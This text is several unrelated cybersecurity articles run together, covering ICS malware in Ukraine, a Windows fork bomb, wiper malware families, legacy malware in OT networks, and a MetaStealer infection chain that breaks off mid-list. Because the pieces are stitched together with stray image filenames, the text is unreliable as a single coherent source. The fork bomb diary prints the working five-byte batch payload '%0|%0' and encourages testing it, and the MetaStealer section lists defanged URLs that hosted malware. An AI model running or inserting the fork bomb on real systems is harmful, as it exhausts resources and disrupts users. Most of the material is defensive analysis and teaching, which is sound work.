Sandworm might be the most infamous group currently known for ICS malware, or malware that is intended specifically to target industrial control systems (ICS) such as programmable logic controllers (PLCs) or unified architecture (UA) servers. This type of malware, while still relatively rare, is more common now than a decade ago, and is increasingly proven capable of achieving dangerous and widespread effects on targeted networks globally.

Ukraine has had the unfortunate distinction of being the place where one of the most noteworthy incidents involving such malware has occurred, but it is far from the only one, and will not be the last to deal with incidents involving it. As anyone who works in the overlapping fields of cyber and engineering knows, it isn’t necessarily the threats or failures you’ve identified that will hurt you, it might be the ones no one has thought of.

The Russian focus on Ukraine’s power grid in particular, and how it has evolved over time, offers valuable lessons for network defenders and industrial engineers as they prepare grids to be resilient against future attacks of this kind.

Have you read:Water utility attacked by sophisticated timed malwareEuropean water utility attacked by cryptocurrency mining malwareNo green grid without cybersecurity

Exploration of energy sector significance

It is no mistake that most of the discovered ICS malware targets energy, or energy-related, functions and systems. When keeping in mind the intended effects, and the state-sponsored groups behind these capabilities, energy becomes a logical target for ICS malware. Energy plays a critical role in the dynamics of international geopolitics. When nation-states confront one another, the energy sector is often at the center of tensions.

This is because of the critical role energy plays in several key factors, such as internal stability through essential services, economic health due to the huge role oil and gas play in many economies, the effects of compliance that can be achieved when crucial suppliers deny or fail to deliver fuel, and finally it is a rapidly digitizing industry on the forefront of competition between the world’s great powers, making it a fertile ground for testing cyber capabilities in a way that sends a quick and direct message.

Besides Ukraine, Saudi Arabia has experienced cyber attacks directed against its energy sector, ones which were both destructive and highly creative in their methodology. Triton malware, which incidentally is also linked to Russia, was used to attempt to cause physical damage at a Saudi petrochemical company by disabling key safety systems, specifically the hardware and software platform used to coordinate across multiple devices.

This focus on eliminating the monitoring, coordination, and redundancy that is essential to modern safety systems could have made the impact of this attack devastating had it fully succeeded. Despite failing, it is understandable why such an attack could benefit a country like Russia, which was assessed to be behind Triton malware and subsequently sanctioned for its development.[3] Russia is in the top tier of nations that both profit from, and are largely dependent on, the energy market.

In past wars the bombing of oil and gas facilities were priority efforts, in future wars the same effects[4] might be achievable from afar using a network connection and a custom malware kit, helping decrease the risk to the attacker and increasing the speed and scale of destruction.

Discussion of malware functions and effects

One of the most significant recent developments in ICS malware was the proactive detection and mitigation of a campaign designed to use INCONTROLLER malware to target machine automation devices, specifically those able to interact with specific industrial equipment leveraged across multiple industries. The desired goal apparently being to interact with that equipment in such a way as to disable safety features, similar to Triton previously discussed above.[5]

Have you read:HBKU and Iberdrola collaborate on smart grid cybersecurityDOE funnels $12m to enhance US energy systems’ cybersecurity

Future Scenarios

Russia’s attempts to take out critical components of the electrical grid using cyber attacks may have been limited in scope and mostly unsuccessful, especially in terms of Ukraine’s ability to quickly recover, but they do show us where ICS malware and its capabilities are headed in the future. Like many other kinds of malware, ICS malware is increasingly focused on infiltrating the commonalities across systems and networks in order to have the greatest chance of exploitation and success.

That means a focus on widely adopted technology, the coding language used to communicate between them, and the software suites that enable multiple processes. In the future, because malicious actors are increasingly aware of what these critical nodes and common overlays are, attacks will be even more stealthy in how they infiltrate supply chains and achieve effects rapidly, both using our engineering processes against us and taking into account detection and response capabilities.

Mitigation

From an engineering perspective, there are some basic concepts that can help address the rising threat posed by ICS-specific malware. Additionally, the cyber security field is heavily engaged in hardening ICS networks and responding to incidents when they occur. Marrying these parallel efforts is an important part of having a strategic approach to this issue.

First, the earlier in a design process that cyber security can be addressed, the better. A resilient design should include not only redundancies, but ways to check if those redundancies are balancing one another effectively. This eliminates a vector for a bad actor to use safety processes against the system.

Second, operating procedures, either in design or in practice, should include the necessary time and resources to review data and indicators for signs of malicious activity. This includes updates, maintenance, and tests. Malicious activity may not be detectable, even on a secured network, if too much trust is placed in “operations as usual” as an indicator of a secure system.

Sign up to our newsletter and stay informed

Third and final, supply chain issues, in terms of new procurement, upgrades and enhancements, should be addressed as part of the design and build of resilient networks. Reviewing code or hardware for faults or signs of manipulation should be just as important as checking the loads or capacities of more traditional equipment and physical plants. The strongest pipeline or best insulated cable in the world won’t do much good if it’s connected to a compromised piece of network hardware purchased from an entity at odds with the geopolitical stance of the buyer’s host nation or corporate structure. Threat intelligence and past incident case studies can be immensely useful in determining how best to address these three areas for consideration.

Conclusion

Engineers, whether working on energy grids or power generation or resource exploitation, are building and maintaining the networks and systems which will be the targets of future ICS malware. This potential attack surface is complex and growing. The good news is we are more aware of threats than ever before, and the resources dedicated to addressing them are maturing and becoming more accessible. A future attempt to disable safety systems or overload a network with malicious traffic to cause harm will certainly occur, and probably sooner than later, but its actual outcome is largely up to us, not the attacker.

Jason Atwell

About the Author:

Jason Atwell is Principal Advisor of Global Intelligence at Mandiant. Atwell helps oversee the Strategic Intelligence & Government and Global Government Consulting practices. Atwell has over 18 years of experience in cyber and risk intelligence from across the military, government, and commercial sectors.

References

[1] https://www.reuters.com/article/us-ukraine-cybersecurity-sandworm-idUSKBN0UM00N20160108

[2] https://www.independent.co.uk/tech/chernobyl-ukraine-petya-cyber-attack-hack-nuclear-power-plant-danger-latest-a7810941.html

[3] https://home.treasury.gov/news/press-releases/sm1162

[4] https://www.reuters.com/article/us-ukraine-cybersecurity-sandworm-idUSKBN0UM00N20160108

[5] https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool

This article was originally published on Power Engineering.

During a malware analysis class I taught recently, one of the students asked me what was “the simplest malware in the world”. Of course, the answer to this question would depend heavily on one’s definitions of ‘simplest’ and ‘malware’, as well as on a target hardware architecture and its operating system (and potentially additional software and other factors), but I thought that it was conceptually interesting enough to devote today’s diary to.

If we were to discuss simplicity only in the terms of overall size of the code, and define ‘malware’ (with small help from NIST[1]), as a “program, that is intended to compromise the confidentiality, integrity, or availability of the victim’s data, applications, or operating system or to otherwise annoy or hinder the victim”, then the simplest malware overall would probably be a single instruction of the “Halt and Catch Fire” type[2] for any platform, on which instructions capable (by design or due to a bug) of stopping CPU operations were available and could be executed on their own. Or – to be exact – the simplest malware would probably be such a code on a platform, on which the instruction would be shortest (which would probably come to a single byte). However, this is purely theoretical answer from a historical standpoint.

If we were move beyond this case and focus only on code that can run on modern operating systems and current hardware platforms, the situation becomes much more complex. And although I spent some time thinking about what the smallest malware might be, and I do have a potential answer, I’m not completely certain it is the correct one. If you can think of a smaller example of a working malicious code, let us know in the comments.

Anyway, since I wasn’t able to think of, nor find anything “smaller”, I came to believe that the most common version of the fork bomb for Windows might be the smallest (at least the smallest current) real world malware.

Fork bombs, or “rabbits” or “wabbits”, as they are also sometimes called, are probably among the oldest types of malware overall[3], and they are quite simple. Their only function is to execute two copies of themselves each time they are run. This means that once a fork bomb is executed on a system, the number of fork bomb processes running on that system will start exponentially increasing, which – as you can probably imagine – will quickly result in resource exhaustion.

The most well-known fork bomb for Windows, which may be implemented as a standalone batch file, is made up of only the following 5 ASCII characters (i.e., 5 bytes). 

%0|%0

Despite its small size, it can have a quick and fairly unpleasant effect – feel free to test it for yourself (though, I would recommend that you do so in a VM, which you won’t mind rebooting afterwards).

As I’ve mentioned, I’m not completely sure that this fork bomb is the smallest malware there is for modern platforms, however, with only 5 bytes in length, it has to be at least close… And it shows quite well that malware does not have to be complex to be effective.

[1] https://csrc.nist.gov/glossary/term/malware
[2] https://en.wikipedia.org/wiki/Halt_and_Catch_Fire_(computing)
[3] https://en.wikipedia.org/wiki/Wabbit_(computing)

———–
Jan Kopriva
@jk0pr
Nettles Consulting

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

cw-podcast-050422.jpg

An upswing in malware deployed against targets in Eastern Europe. Cozy Bear is typosquatting. CuckooBees swarm around intellectual property. Tracking the DPRK’s hackers. Quiet persistence in corporate networks. CISA issues an ICS advisory. Caleb Barlow on backup communications for your business during this period of “shields up.” Duncan Jones from Cambridge Quantum sits down with Dave to discuss the NIST algorithm finalist Rainbow vulnerability. And, hey, officer, honest, it was just a Squirtle….

For links to all of today’s stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/86

Selected reading.

Update on cyber activity in Eastern Europe (Google) 

Multiple government hacking groups stay busy targeting Ukraine and the region, Google researchers say (CyberScoop)

Google: Nation-state phishing campaigns expanding to target Eastern Europe orgs (The Record by Recorded Future)

SolarWinds hackers set up phony media outlets to trick targets (CyberScoop) 

SOLARDEFLECTION C2 Infrastructure Used by NOBELIUM in Company Brand Misuse (Recorded Future) 

Experts discover a Chinese-APT cyber espionage operation targeting US organizations (VentureBeat)

Operation CuckooBees: Cybereason Uncovers Massive Chinese Intellectual Property Theft Operation (Cybereason Nocturnus) 

Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques (Cybereason) 

Chinese hackers cast wide net for trade secrets in US, Europe and Asia, researchers say (CNN) 

Researchers tie ransomware families to North Korean cyber-army (The Record by Recorded Future)

The Hermit Kingdom’s Ransomware Play (Trellix)

New espionage group is targeting corporate M&A (TechCrunch) 

Cyberespionage Group Targeting M&A, Corporate Transactions Personnel (SecurityWeek) 

UNC3524: Eye Spy on Your Email (Mandiant) 

Yokogawa CENTUM and ProSafe-RS (CISA) 

Cops ignored call to nearby robbery, preferring to hunt Pokémon (Graham Cluley)

best_practices_OG.jpg

Executive summary

2022 has experienced an increase in the number of wiper variants targeting Ukrainian entities.
This blog post looks to explain how wipers work, what makes them so effective and provides a short overview of the most recent samples that appeared in the eastern Europe geopolitical conflict.

How does wiper malware work?

Wiper’s main objective is to destroy data from any storage device and make the information unavailable (T1485). There are two ways of removing files, logical and physical.

Logical file removal is the most common way of erasing a file, performed by users daily when a file is sent to (and emptied from) the Recycle bin, or when it is removed with the command line or terminal with the commands del/rm. This action deletes the pointer to the file but not the file data, making it recoverable with forensic tools as long as the Operative System does not write any other file in the same physical location.

However, malware wipers aim to make the data irrecoverable, so they tend to remove the data from the physical level of the disk. The most effective way to remove the data/file is by overwriting the specific physical location with other data (usually a repeated byte like 0xFF). This process usually involves writing to disk several Gigabytes (or Terabytes) of data and can be time consuming. For this reason, in addition to destroying the data, many wipers first destroy two special files in the system:

The Master Boot Record (MBR), which is used during the boot process to identify where the Operative System is stored in the disk. By replacing the MBR, the boot process crashes, making the files inaccessible unless forensic methodologies are used.
The Master File Table (MFT) is exclusive to NTFS file systems, contains the physical location of files in the drive as well as logical and physical size and any associated metadata. If big files need to be stored in the drive, and cannot use consecutive blocks, these files will have to be fragmented in the disk. The MFT holds the information of where each fragment is stored. Removing the MFT will require the use of forensic tools to recover small files, and basically prevents recovery of fragmented files since the link between fragments is lost.

The main difference between wipers and ransomware is that it’s impossible to retrieve the impacted information after a wiper attack. Attackers using wipers do not usually target financial reward but intend to disrupt the victim’s operations as much as possible. Ransomware operators aim to get a payment in exchange for the key to decrypt the user’s data.

With both wiper and ransomware attacks, the victim depends on their back up system to recover after an attack. However, even some wiper attacks carry ransom notes requesting a payment to recover the data. It is important that the victim properly identifies the attack they’ve suffered, or they may pay the ransom without any chance of retrieving the lost data.

In the last month and a half, since the war started in Eastern Europe, several wipers have been used in parallel with DDoS attacks (T1499) to keep financial institutions and government organizations, mainly Ukrainian, inaccessible for extended periods of time. Some of the wipers observed in this timeframe have been: WhisperKill, HermeticWiper, IsaacWiper, CaddyWiper, DoubleZero Wiper and AcidRain.

Most recent wiper examples

WhisperKill

On January 14, 2022, the Ukrainian government experienced a coordinated attack on 22 of their government agencies, defacing their websites. Almost all the compromised websites were developed by the same Ukranian IT company, Kitsoft, and all of them were built on OctoberCMS. Therefore, the attack vector was most probably a supply chain attack on the IT provider, or an exploitation of an OctoberCMS vulnerability, combined with exploitations of Log4Shell vulnerability (T1190).

defaced Ukrainian website

Figure 1. Example of defaced Ukrainian government website.

In addition to the website defacement, Microsoft Threat Intelligence Center (MSTIC), identified in a report destructive malware samples targeting Ukrainian organizations with two malware samples. Microsoft named the samples WhisperGate, while other security companies labeled the downloader as WhisperGate and WhisperKill as the actual wiper, which was considered a component of WhisperGate.

The identified files were:

Stage1 replaces the Master Boot Record (MBR) with a ransom note when the system is powered down, deeming the machine unbootable after that point. When booted up, the system displays Figure 2 on screen. Despite the ransom request, the data will not be recoverable since all efforts made by WhisperKill are looking to destroy data, not encrypt it. In this case, the wallet is most probably an attempt to decoy attribution efforts.

wiper ransom note

Figure 2. Ransom note obtained by MSTIC.

Stage 2 attempts to download the next stage malware (T1102.003) from the Discord app, if unsuccessful, it sleeps and tries again. The payload downloaded from the messaging app destroys as much data as possible by overwriting certain file types with 0xCC for the first MB of the file. Then it modifies the file extension to a random four-byte extension. By selecting the file types to be wiped and only writing over the first MB of data, the attackers are optimizing the wiping process. This is due to not wasting time on system files and only spending the necessary time to wipe each file, rapidly switching to the next file as soon as the current one is unrecoverable. Finally, the malware executes a command to delete itself from the system (T1070.004).

HermeticWiper

A month after, on February 23rd 2022, ESET Research reported a new Wiper being used against hundreds of Ukrainian systems. The wiper receives its name from the stolen certificate (T1588.003) it was using to bypass security controls “Hermetica Digital Ltd” (T1588.003). According to a Reuters article, the certificate could have also been obtained by impersonating the company and requesting a certificate from scratch.

hermetica certificate

Figure 3. Hermetica Digital Ltd certificate.

The attackers have been seen using several methods to distribute the wiper through the domain, like: domain Group Policy Object (GPO) (T1484.001), Impacket or SMB (T1021.002) and WMI (T1047) with an additional worm component named HermeticWizard.

The wiper component first installs the payload as a service (T1569.002) under C:Windowssystem32Drivers. Afterwards, the service corrupts the first 512 bytes of the MBR of all the Physical Drives, and then enumerates their partitions. Before attempting to overwrite as much data as the wiper can it will delete key files in the partition, like MFT, $Bitmap, $LogFile, the NTUSER registry hive (T1112) and the event logs (T1070.001).

On top of deleting key file system structures, it also performs a drive fragmentation (breaking up files and segregating them in the drive to optimize the system’s performance). The combination of the file fragmentation and the deletion of the MFT makes file recovery difficult, since files will be scattered through the drive in small parts – without any guidance as to where each part is located.

Finally, the malware writes randomized contents into all occupied sectors in the partition in an attempt to remove all potential hope of recovering any data with forensic tools or procedures.

IsaacWiper

A day after the initial destructive attack with HermeticWiper, on February 24th, 2022, a new wiper was used against the Ukrainian government, as reported by ESET, without any significant similarities to the HermaticWiper used the day before.

IsaacWiper identifies all the physical drives not containing the Operative System and locks their logical partitions by only allowing a single thread to access each of them. Then it starts to write random data into the drives in chunks of 64 KB. There is a unique thread per volume, making the wiping process very long.

Once the rest of the physical drives and the logical partitions sharing physical drive with the Operative System’s volume have been wiped, this last volume is wiped by:

Erasing the MBR.
Overwriting all files with 64 KB chunks of random data with one thread.
Creating a new file under the C drive which will be filled with random data until it takes the maximum space it can from the partition, overwriting the already overwritten existing files. This process is performed with a different thread, but it would still take a long time to write the full partition since both concurrent threads are actually attempting to write random data on the full disk.

Isaacwiper strings

Figure 4. IsaacWiper strings.

When comparing IsaacWiper to WhisperKill, the attackers’ priorities become clear. WhisperKill creators prioritized speed and number of affected files over ensuring the full drive is overwritten, since only 1 MB of each file was overwritten. On the other hand, IsaacWiper creators gave total priority to deliver the most effective wiper, no matter how long it takes to overwrite the full physical disk.

AcidRain

On the same day IsaacWiper was deployed, another wiper attacked Viasat KA-SAT modems in Ukraine, this time with a different wiper, named AcidRain by SentinelLABS. This wiper was particularly aimed at modems, probably to disrupt Internet access from Ukraine. This new wiper showed similarities to previously seen botnets targeting modems using VPNFilter. It was used in 2018, targeting vulnerabilities in several common router brands: Linksys, MikroTik, NETGEAR, and TP-Link. Exploiting vulnerabilities allowed the attackers to obtain Initial Access inside all types of networks, where the bot would search for Modbus traffic to identify infected systems with Industrial Control Systems (ICS).

The wiper used was the ELF MIPS wiper targeting Viasat KA-SAT modems, which aimed to firstly overwrite any file outside of the any common *nix installation: bin, boot, dev, lib, proc, sbin, sys, sur, etc. to then delete data from /dev/.

CaddyWiper

The first version of CaddyWiper was discovered by ESET researchers on 2022-03-14 when it was used against a Ukrainian bank. This new wiper variant does not have any significant code similarities to previous wipers. This sample specifically sets an exclusion to avoid infecting Domain Controllers in the infected system. Afterwards, it targets C:/Users and any additional attached drive all the way to letter Z:/ and zeroes all the files present in such folders/drives. Finally, the extended information of the physical drives is destroyed, including the MBR and partition entries.

A variant of CaddyWiper was used again on 2022-04-08 14:58 against high-voltage electrical substations in Ukraine. This latest version of the wiper was delivered together with Industroyer2, an evolution of Industroyer, which has the main functionn being to communicate with industrial equipment. In this case, the wiper was used with the purpose of slowing down the recovery process from the Industroyer2 attack and gaining back control of the ICS consoles, as well as covering the tracks of the attack. According to Welivesecurity, who have been cooperating with CERT-UA in this investigation, the Sandworm Team is behind this latest attack.

In this same attack against the energy station in Ukraine, other wiper samples for Linux and Solaris were observed by WeliveSecurity. These wipers leverage the shred command if present, otherwise they use the basic dd or rm commands to wipe the system.

DoubleZero wiper

On March 22, 2022 CERT-UA reported a new wiper used against their infrastructure and enterprises. Named DoubleZero, the wiper was distributed as a ZIP file containing an obfuscated .NET program. The wiper’s routine sets a hardcoded list of system directories, which are skipped during an initial wiping targeting user files. Afterwards, the skipped system directories are targeted and finally the registry hives: HKEY_LOCAL_MACHINE (containing the hives Sam, Security, Software and System), HKEY_CURRENT_USER and HKEY_USERS.

There are two wiping methods, both of which zero out the selected file.

doublezero wiper

Figure 5. DoubleZero first wiping function.

Conclusion

As we have seen in the examples above, the main objective of the attackers behind wipers is to destroy all possible data and render systems unbootable (if possible), potentially requiring a full system restore if backups aren’t available. These malware attacks can be as disruptive as ransomware attacks, but wipers are arguably worse since there is no potential escape door of a payment to recover the data.

There are plenty of ways to wipe systems. We’ve looked at 6 different wiper samples observed targeting Ukranian entities. These samples approach the attack in very different ways, and most of them occur faster than the time required to respond. For that reason, it is not effective to employ detection of wiper malware, as once they are in the system as it is already too late. The best approach against wipers is to prevent attacks by keeping systems up to date and by increasing cybersecurity awareness. In addition, consequences can be ameliorated by having periodic backup copies of key infrastructure available.

Associated indicators (IOCs)

The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the following OTX Pulses:

WhisperKill
HermeticWiper and IsaacWiper
AcidRain
CaddyWiper
DoubleZero

Please note, the pulses may include other activities related but out of the scope of the report.

TYPE

INDICATOR

DESCRIPTION

SHA256

a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92

WhisperKill (stage1.exe)

SHA256

dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78

WhisperKill (stage2.exe)

SHA256

0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da

HermeticWiper

SHA256

1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591

HermeticWiper

SHA256

13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033

IsaacWiper

SHA256

9b4dfaca873961174ba935fddaf696145afe7bbf5734509f95feb54f3584fd9a

AcidRain

SHA256

47f521bd6be19f823bfd3a72d851d6f3440a6c4cc3d940190bdc9b6dd53a83d6

AcidRain

SHA256

Fc0e6f2effbfa287217b8930ab55b7a77bb86dbd923c0e8150551627138c9caa

CaddyWiper

SHA256

7062403bccacc7c0b84d27987b204777f6078319c3f4caa361581825c1a94e87

Industroyer2

SHA256

3b2e708eaa4744c76a633391cf2c983f4a098b46436525619e5ea44e105355fe

DoubleZero

SHA256

30b3cbe8817ed75d8221059e4be35d5624bd6b5dc921d4991a7adc4c3eb5de4a

DoubleZero

 

Mapped to MITRE ATT&CK

The findings of this report are mapped to the following MITRE ATT&CK Matrix techniques:

TA0001: Initial Access

T1190: Exploit Public-Facing Application

TA0002: Execution

T1047: Windows Management Instrumentation
T1569: System Services

T1569.002: Service Execution

TA0008: Lateral Movement

T1021: Remote Services

T1021.002: SMB/Windows Admin Shares

TA0005: Defense Evasion

T1070: Indicator Removal on Host

T1070.004: File Deletion
T1070.001: Clear Windows Event Logs

T1112: Modify Registry
T1484: Domain Policy Modification

T1484.001: Group Policy Modification

TA0011: Command and Control

T1102: Web Service

T1102.003: One-Way Communication

TA0040: Impact

T1485: Data Destruction
T1499: Endpoint Denial of Service

TA0042: Resource Development

T1588: Obtain Capabilities

T1588.003: Code Signing Certificates

Car-Factory-Professional-Male-Automotive

This post was written with contributions from IBM Security’s Sameer Koranne and Elias Andre Carabaguiaz Gonzalez.

Operational technology (OT) — the networks that control industrial control system processes — face a more complex challenge than their IT counterparts when it comes to updating operating systems and software to avoid known vulnerabilities. In some cases, implementation of a patch could lead to hours or days of costly downtime. In other cases, full mitigation would require net new purchases of potentially millions of dollars worth of machinery to replace already functional systems simply because they are timeworn.

It’s no secret OT systems face this conundrum — and it’s become increasingly obvious cyber criminals are aware of this weakness, too. While there’s no shortage of recent headlines decrying the vulnerability of these systems to the more sophisticated malware commonly used by threat actors today, those conversations have overlooked another potential — yet equally serious — threat to OT: older malware still floating in the ether.

This is malware for which most systems have been patched and protected against, immunizing large swaths of networks and effectively dropping the older malware from the radar of IT teams (and headlines). Two examples of this kind of older malware include Conficker and WannaCry.

While occurrences of these malware types plaguing OT environments are relatively rare, they do occur — and often leave organizations combating a threat that was largely forgotten.

WannaCry: The Scourge of 2017… and Beyond

The WannaCry ransomware outbreak was a watershed for cybersecurity professionals in 2017 — a moment in time many in this industry will never forget. The fast-spreading worm that leveraged the Eternal Blue exploit ended up affecting more than 200,000 devices in over 150 countries. From X-Force’s perspective, WannaCry is the ransomware type they have most commonly seen at organizations with OT networks since 2018 — and, occasionally, WannaCry will even migrate into OT portions of the network itself.

One example of WannaCry infecting an OT network is Taiwan Semiconductor Manufacturing Company (TSMC) in 2018. Despite having robust network segmentation and cybersecurity practices in place, human error led to a vendor installing a software update on the OT portion of the network using a machine unknowingly infected with WannaCry ransomware. Because the laptop used for the software installation had been patched and was using an up-to-date operating system, it was not susceptible to the ransomware — but the OT network, on the other hand, was very susceptible.

The WannaCry ransomware spread quickly across TSMC’s network and infected several systems, since the OT network included multiple unpatched Windows 7 systems. The ransomware affected sensitive semiconductor fabrication equipment, automated material handling systems, and human-machine interfaces. It also caused days of downtime estimated to cost the company $170 million. CC Wei, the CEO of the company, said in a statement, “We are surprised and shocked. We have installed tens of thousands of tools before, and this is the first time this happened.” As a result of the incident, the company implemented new automated processes that would be less likely than human error to miss a critical security step.

WannaCry continues to affect organizations with OT networks, although — thankfully — X-Force observes such incidents much less frequently today than they did in 2018 and 2019, as many organizations are able to apply patches or identify workarounds to more effectively insulate networks from WannaCry.

Enter Conficker: Continuing to Emerge in 2021

An old worm — even older than WannaCry — that X-Force has observed on OT networks in 2021, however, is Conficker. This worm emerged in late 2008 as threat actors quickly leveraged newly released vulnerabilities in Microsoft XP and 2000 operating systems. Conficker seeks to steal and leverage passwords and hijack devices running Windows to run as a botnet. Because the malware is a worm, it spreads automatically, without human intervention, and has continued to spread worldwide for well over a decade.

Conficker — sometimes with different names and variants — is still present in some systems today, including in OT environments. As with WannaCry, the presence of legacy technologies and obsolete operating systems — including Windows XP, Windows Server 2003, and proprietary protocols that are not updated or patched as often as their IT network counterparts — make these environments especially vulnerable to Conficker. In addition, many legacy systems have limited memory and processing power, further constraining administrators’ ability to insulate them from infections such as Conficker or WannaCry, as the system will not even support a simple antivirus software installation.

The Conficker worm is particularly effective against Windows XP machines, especially unpatched versions, which are common in OT environments. The fast-spreading nature of the Conficker worm can be a challenge for network engineers — once infected, every Windows machine connected to the network could be impacted in as little as one hour. Since many OT environments are built on 20- to 30-year-old designs, partially modified to have connectivity for ease of access, it provides the ideal environment for even the simplest malware, Conficker included.

From Conficker infections X-Force has observed, the worm is able to affect human machine interfaces (HMIs), which have transmitted network traffic initially alerting security staff of the infection. X-Force malware reverse engineering of the Conficker worm indicates that it exploits the MS08-067 vulnerability to initially infect the host. Fortunately, in some cases Conficker malware — even when present in OT environments — has not led to operational damage or product quality degradation. Of course, this may not be the case for all network architectures on which Conficker malware may appear.

Defending OT Networks from Old Malware: Lessons From the Trenches

Even though many OT environments are running obsolete software and network topographies, there are measures organizations can take to defend against older malware strains such as WannaCry and Conficker. Often, the highest priority in an OT environment is maximizing uptime, leaving little room for maintenance, re-design, updates and their associated downtime. Yet even within these confines, there are many measures organizations can take to decrease the opportunities for old malware to get onto, spread within, and negatively affect their network.

Some of these include:

1. Network segmentation: Micro-segment the networks within an OT environment. If different lines do not need to communicate with each other, there is no need to create and maintain a large network subnet for all systems. Improve reliability of systems by segregating those in smaller subnets and restricting traffic at boundaries. In addition, an industrial demilitarized zone (iDMZ) is your best ally for compartmentalization and network segmentation. Avoid dynamic host configuration protocol (DHCP) as much as possible; should you be required to use it, subnet it to the lowest possible net mask. Configure virtual local area networks (VLANs) if possible.

2. Know what you have: Systems older than 20 years probably do not have a good electronic record in a configuration management database (CMDB) and may be missing or have outdated network drawings. Reverse engineering this information during an incident is not productive, and ensuring assets and network information is maintained accurately can go a long way. Be aware of the IPs, MACs, operating systems, and software licenses in your asset inventory. Get to know your environment up to the revision date of your software. Make clear which users are allowed to log on to machines based on specific roles; if possible, link users to a machine’s serial number.

3. Harden legacy systems to maintain a secure configuration: Remove all unused users and revoke all unnecessary administrative privileges, remove all unused software, disable all unused ports (running a packet capture can help), and prohibit using these assets for personal use. Insecure configuration of endpoints can leave open vulnerabilities for exploitation by adversaries or self-propagating malware. Identify unused and unwanted applications and delete them to reduce the attack surface. Avoid proprietary protocols as much as possible, unless they are constantly updated; check for and use better, newer protocols that are standardized.

4. Continuous Vulnerability Management: A vulnerability management program allows organizations to reduce the likelihood of vulnerability exploitation and unauthorized network access by a malicious actor and is necessary to make informed vulnerability treatment decisions based on risk appetite and regulatory compliance requirements. All necessary security and safety relevant patches must be applied as soon as feasible. If it is not possible to patch the system, ensure other compensating security controls are implemented to reduce the risk. Identify the lowest demand times in a day or week and commit to having downtime and maintenance windows for patching and updating. Routinely check for advisories on ICS-CERT and note whether your vendors are impacted.

5. Reduce SMB Attack Surface: Both WannaCry and Conficker are known to exploit SMB. Server Message Block (SMB) is a network communication protocol used to provide shared access to services on a network, such as file shares and printers. Because of its prevalence in information technology environments, adversaries commonly use this protocol to move laterally within a compromised environment, interact with remote systems, deploy malware, and transfer files. Moreover, SMB can provide a convenient way to bypass Multi-Factor Authentication (MFA) and remotely execute code. To reduce the attack surface and the overall risk associated with SMB-based lateral movement, consider the following hardening measures:

Configure Windows firewall to DENY all inbound SMB communications to workstations. This control will disable inbound connections on TCP ports 139 and 445.
Audit server SMB requirements and explicitly DENY SMB inbound on servers that do not require the protocol as part of their functionality.
Consider disabling legacy versions of the SMB protocol and migrating business applications to SMB v3.1. This activity requires careful planning and risk evaluation due to its potential impact on business operations.

6. Avoid the use of Portable Media: Uncontrolled portable media significantly increase the risks to the legacy OT environments, as OT systems may not have the latest security patches to defend against newer attack methodologies. Uncontrolled and unsecured allowance of portable media can expose an OT network to exploits and unplanned outages and downtime.

Have a security policy for secure use of portable media in OT environments.
Ideally, strictly prohibit use of USB flash drives. Should there be an absolute necessity of using one, designate a single USB stick for any maintenance and re-format it every time you use it.
Implement processes and technical controls that adequately support the security policy requirements. Controls may include, but are not limited to the following:
Every use of the device is documented in the logbook
The devices are scanned on designated quarantine PCs to ensure robust AV scan before using on OT endpoints. Ensure that anti-malware software is configured to automatically scan portable media
Control the number of portable media devices approved to be used in the environment
Disable autorun and autoplay auto-execute functionality for removable media.

Consider implementing Secure Media Exchange solutions such as Honeywell SMX or OPSWAT MetaDefender.

7. Rehearse Disaster Recovery (DR) and Incident Response (IR) scenarios regularly: DR plans should be documented, reliable backups should be available, and OT personnel must have an understanding and intimate knowledge of how the system should be recovered. IR and DR exercises should be conducted regularly to build the muscle memory needed for reliable recovery. Educate your team about imminent security threats and make them part of the security process. As part of any plan, have a direct line with your organization’s CSIRT: your best play is always a fast response and a transparent environment, so be organized and report everything.

8. Employ network monitoring solutions: Firewalls, Access Control Lists (ACLs) and Intrusion Prevention Systems (IPS) can assist in keeping a close eye on traffic traversing your network. Check for new nodes or machines communicating with suspicious assets. If you employ an intrusion detection system (IDS), ensure your signatures are up to date. Even when monitoring for old malware, new signatures appear every day.

While it isn’t common for an OT network to be infected with older malware like WannaCry or Conficker, documented cases do indeed exist, and they can leave costly destruction and even safety consequences in their wake.

To learn how X-Force can keep your network safer, download the X-Force for OT solution brief.

Read the 2022 X-Force Threat Intelligence Index Report to understand the latest OT Threats

The post Where Everything Old is New Again: Operational Technology and Ghost of Malware Past appeared first on Security Intelligence.

Introduction

Since Wednesday 2022-03-30, at least 16 samples of a specific Excel file have been submitted to VirusTotal.These malicious Excel files are distributed as email attachments.Post-infection traffic triggers signatures for Win32/MetaStealer Related Activity from the EmergingThreats Pro (ETPRO) ruleset.This infection process uses data binaries to create the malicious EXE and DLL files used for the infection.The malware abuses legitimate services by Github and transfer.sh to host these data binaries.All URLs, domains, and IP addresses were still active for the infection approximately 3 hours before I posted this diary.

Shown above:  Flow chart for the MetaStealer infection chain reviewed in today’s diary.

Images from an infection

Shown above:  Screenshot from an email distributing the malicious Excel file.

Shown above:  Screenshot of the malicious Excel file.

Shown above:  Traffic from an infection on Tuesday 2022-04-05 filtered in Wireshark.

Shown above:  Alerts from the infection Security Onion using the Suricata and the ETPRO ruleset.

Shown above:  UAC alert generated by malicious EXE during the infection.

Shown above:  Malicious EXE file generated during the infection.

Shown above:  Malicious EXE persistent on the infected Windows host.

Indicators of Compromise (IOCs)

Traffic generated after enabling Excel macro:

hxxps://github[.]com/michel15P/1/raw/main/notice.ziphxxps://raw.githubusercontent[.]com/michel15P/1/main/notice.zipNote: File returned from the above URL is a data binary and not a zip archive

Traffic generated by persistent EXE created from the above binary:

